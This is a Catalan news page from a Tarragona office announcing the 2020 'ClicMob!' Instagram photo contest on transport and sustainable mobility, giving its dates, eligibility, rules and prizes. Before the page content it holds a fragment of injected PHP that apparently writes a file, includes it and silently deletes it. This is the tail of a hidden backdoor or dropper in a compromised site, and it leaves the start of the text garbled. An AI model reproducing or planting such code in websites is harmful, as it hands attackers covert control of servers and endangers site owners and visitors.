");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Participa en el concurs de fotografia ClicMob! #Mobilitat2020
Iconos cabecera

Destaquem

  • SEM 2021SEM 2021
    Setmana Europea de la Mobilitat 2021

Participa en el concurs de fotografia ClicMob! #Mobilitat2020 (15/09/2020)

El concurs fotogràfic ‘ClicMob!’ consisteix en la publicació de fotografies sobre el transport i la mobilitat sostenible amb l’etiqueta #Mobilitat2020 a la xarxa Instagram.

Calendari

Del 16 al 28 de setembre de 2020.

Participants

Pot participar en el concurs fotogràfic qualsevol persona física de 14 anys o més i amb domicili a l'àmbit territorial de Catalunya que no hagi estat implicada en la definició i/o preparació d'aquest concurs.

Les persones menors de 18 anys han de tenir el consentiment dels seus pares o tutors per participar en el concurs.

Desenvolupament del concurs

1. Publicar fotografies, per a la qual cosa cal:
- Fer una fotografia d'elements de transport i mobilitat diferenciadors i identificables de Catalunya. També de les activitats de la Setmana Europea de la Mobilitat, com pedalades, caminades i altres activitats. És obligatori que la fotografia hagi estat feta al territori de Catalunya.
- Posar un títol a la fotografia, preferiblement identificatiu del lloc o l'acció fotografiats.
- Etiquetar la fotografia amb l'etiqueta o hashtag #Mobilitat2020, sens perjudici d'altres etiquetes que l'autor de la fotografia hi vulgui incloure.
- Cal mencionar una persona usuària de la xarxa Instagram.

Premis

Primer premi
Un abonament de transport per a tot un any per a la millor fotografia.

Segon premi
Una estada a Vall de Núria per a la fotografia que obtingui la segona millor puntuació. Vàlid per a una estada d'una nit per a dues persones a l'Hotel Vall de Núria en règim de dormir més esmorzar. Cal consultar la disponibilitat abans de fer-ne la reserva.Vàlid per a la temporada d'hivern 20/21.

Tercer premi
Un bitllet a PortAventura per a dues persones per a la fotografia que obtingui la tercera millor puntuació. Vàlid per a dos bitllets combinats amb el parc PortAventura World. Inclou el desplaçament d'anada i tornada des de qualsevol estació de Rodalies de Catalunya.Inclou l'entrada d'un dia al parc.

Més informació a: https://territori.gencat.cat/ca/03_infraestructures_i_mobilitat/sem/activitats/clicmob/

[Tornar a Notícies]

 
Carrer d' Anselm Clavé, 1 43004 - Tarragona